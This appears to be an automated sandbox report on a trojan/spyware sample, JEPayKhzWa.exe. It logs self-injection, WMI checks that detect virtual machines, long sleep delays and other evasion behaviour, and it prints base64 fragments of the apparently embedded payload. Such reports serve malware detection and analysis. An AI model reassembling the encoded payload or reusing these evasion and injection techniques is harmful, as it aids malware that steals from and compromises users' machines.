vQUVBQUFnQUFBQjBBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZkFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTlI5QVFBQUFBQUFTQUFBQUFJQUJRQXdvUUFBVk53QUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3hjQUFBb0tBbjRMQVFBRUpTMFhKbjRLQVFBRS9nYTZBUUFHY3hnQUFBb2xnQXNCQUFRb0FRQUFLMjhhQUFBS0N6aW9BZ0FBQjI4YkFBQUtGeGNaalVZQUFBRWxGaDhLalVjQUFBRWwwT2NBQUFRb0hBQUFDbk1kQUFBS29pVVhIbzFIQUFBQkpkRGZBQUFFS0J3QUFBcHpIUUFBQ3FJbEdCMk5Sd0FBQVNYUTVBQUFCQ2djQUFBS2N4MEFBQXFpS01JQUFBWnZIZ0FBQ2d3NElnSUFBQklDS0I4QUFBb05jN01CQUFZVEJIUHNBQUFHRXdVUkJINGdBQUFLZlFrQkFBUitJQUFBQ2hNR0VRUUpjeUVBQUFvb0lnQUFDbThqQUFBS2ZRa0JBQVFSQkhzSkFRQUVIdytOUndBQUFTWFE3d0FBQkNnY0FBQUtjeDBBQUFwdkpBQUFDaXdhSG8xSEFBQUJKZERhQUFBRUtCd0FBQXB6SFFBQUNoTUdLMDhKSHo2TlJ3QUFBU1hRcHdBQUJDZ2NBQUFLY3gwQUFBcHlBUUFBY0g0Z0FBQUtLQ1VBQUFvb0pnQUFDbThrQUFBS0xRNFJCSHNKQVFBRUtNVUFBQVlyREJFRWV3a0JBQVFveEFBQUJoTUdFUVlvSndBQUNqb3lBUUFBRVFZV2J5Z0FBQW9UQ0JJSUtDa0FBQXB2S2dBQUNoRUdGaGR2S3dBQUNpZ3NBQUFLRXdZUkJIc0pBUUFFS01NQUFBWVRCeEVIS0NjQUFBbzY4Z0FBQUJFRkVRWnY0QUFBQmhFRkVRZHY0Z0FBQmhFRkVRVCtCclFCQUFaekxRQUFDbjRNQVFBRUpTMFhKbjRLQVFBRS9nYTdBUUFHY3k0QUFBb2xnQXdCQUFRb0FnQUFLMi9rQUFBR0VRVVJCUDRHdFFFQUJuTXZ
                    Source: 4.0.JEPayKhzWa.exe.ef0000.0.unpack, SystemServiceModelChannelsServiceChannelICallOnce94314.csBase64 encoded string: 'VServiceModelChannelsWebSocketTransportDuplexSessionChannelcDisplayClass49144FZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQU9OQ2ZxQUFBQUFBQUFBQUFPQUFBZ0VMQVRBQUFIQUJBQUFNQUFBQUFBQUE4bjBCQUFBZ0FBQUFvQUVBQUFCQUFBQWdBQUFBQkFBQUJBQUFBQUFBQUFBRUFBQUFBQUFBQUFEZ0FRQUFCQUFBQUFBQUFBSUFRSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFLQjlBUUJQQUFBQUFLQUJBT1FFQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU1BQkFBd0FBQUNFZlFFQUhBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUE4R3dCQUFBZ0FBQUFjQUVBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQU9RRUFBQUFvQUVBQUFnQUFBQjBBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQU1BQkFBQUVBQUFBZkFFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTlI5QVFBQUFBQUFTQUFBQUFJQUJRQXdvUUFBVk53QUFBTUFBQUF6QUFBR0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFHekFKQVB3Q0FBQUJBQUFSY3hjQUFBb0tBbjRMQVFBRUpTMFhKbjRLQVFBRS9nYTZBUUFHY3hnQUFBb2xnQXNCQUFRb0FRQUFLMjhhQUFBS0N6aW9BZ0FBQjI4YkFBQUtGeGNaalVZQUFBRWxGaDhLalVjQUFBRWwwT2NBQUFRb0hBQUFDbk1kQUFBS29pVVhIbzFIQUFBQkpkRGZBQUFFS0J3QUFBcHpIUUFBQ3FJbEdCMk5Sd0FBQVNYUTVBQUFCQ2djQUFBS2N4MEFBQXFpS01JQUFBWnZIZ0FBQ2d3NElnSUFBQklDS0I4QUFBb05jN01CQUFZVEJIUHNBQUFHRXdVUkJINGdBQUFLZlFrQkFBUitJQUFBQ2hNR0VRUUpjeUVBQUFvb0lnQUFDbThqQUFBS2ZRa0JBQVFSQkhzSkFRQUVIdytOUndBQUFTWFE3d0FBQkNnY0FBQUtjeDBBQUFwdkpBQUFDaXdhSG8xSEFBQUJKZERhQUFBRUtCd0FBQXB6SFFBQUNoTUdLMDhKSHo2TlJ3QUFBU1hRcHdBQUJDZ2NBQUFLY3gwQUFBcHlBUUFBY0g0Z0FBQUtLQ1VBQUFvb0pnQUFDbThrQUFBS0xRNFJCSHNKQVFBRUtNVUFBQVlyREJFRWV3a0JBQVFveEFBQUJoTUdFUVlvSndBQUNqb3lBUUFBRVFZV2J5Z0FBQW9UQ0JJSUtDa0FBQXB2S2dBQUNoRUdGaGR2S3dBQUNpZ3NBQUFLRXdZUkJIc0pBUUFFS01NQUFBWVRCeEVIS0NjQUFBbzY4Z0FBQUJFRkVRWnY0QUFBQmhFRkVRZHY0Z0FBQmhFRkVRVCtCclFCQUFaekxRQUFDbjRNQVFBRUpTMFhKbjRLQVFBRS9nYTdBUUFHY3k0QUFBb2xnQXdCQUFRb0FnQUFLMi9rQUFBR0VRVVJCUDRHdFFFQUJuTXZ
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/25@5/1
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JEPayKhzWa.exe.logJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2C38.tmpJump to behavior
                    Source: JEPayKhzWa.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: JEPayKhzWa.exeVirustotal: Detection: 60%
                    Source: JEPayKhzWa.exeReversingLabs: Detection: 62%
                    Source: unknownProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe 'C:\Users\user\Desktop\JEPayKhzWa.exe'
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exe
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exe
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exeJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exeJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: JEPayKhzWa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: JEPayKhzWa.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: JEPayKhzWa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: JEPayKhzWa.exeStatic PE information: 0x99CD706E [Sun Oct 8 11:35:10 2051 UTC]
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_00F73509 push ss; ret 0_2_00F73534
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 0_2_00F73148 push ss; ret 0_2_00F73534
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 3_2_002C3148 push ss; ret 3_2_002C3534
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 3_2_002C3509 push ss; ret 3_2_002C3534
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_00EF3509 push ss; ret 4_2_00EF3534
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_00EF3148 push ss; ret 4_2_00EF3534
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_0305F100 push ecx; ret 4_2_0305F112
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_03052877 push ebx; ret 4_2_0305287A
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeCode function: 4_2_05CD9C82 push ss; iretd 4_2_05CD9D17
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion:

                    barindex
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWindow / User API: threadDelayed 924Jump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWindow / User API: threadDelayed 8008Jump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe TID: 7100Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exe TID: 6432Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: JEPayKhzWa.exe, 00000004.00000002.721021785.0000000006AE6000.00000004.00000001.sdmpBinary or memory string: VMware
                    Source: JEPayKhzWa.exe, 00000004.00000002.721021785.0000000006AE6000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareA3VLLWVCWin32_VideoControllerP5LP2SPGVideoController120060621000000.000000-000832.2960display.infMSBDAHSFMW4GFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors1SSOX79Zk
                    Source: JEPayKhzWa.exe, 00000004.00000002.720977141.0000000006AC3000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareA3VLLWVCWin32_VideoControllerP5LP2SPGVideoController120060621000000.000000-000832.2960display.infMSBDAHSFMW4GFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors1SSOX79ZT771ROOT\//?U
                    Source: JEPayKhzWa.exe, 00000004.00000002.712813148.000000000151C000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeMemory written: C:\Users\user\Desktop\JEPayKhzWa.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exeJump to behavior
                    Source: C:\Users\user\Desktop\JEPayKhzWa.exeProcess created: C:\Users\user\Desktop\JEPayKhzWa.exe C:\Users\user\Desktop\JEPayKhzWa.exeJump to behavior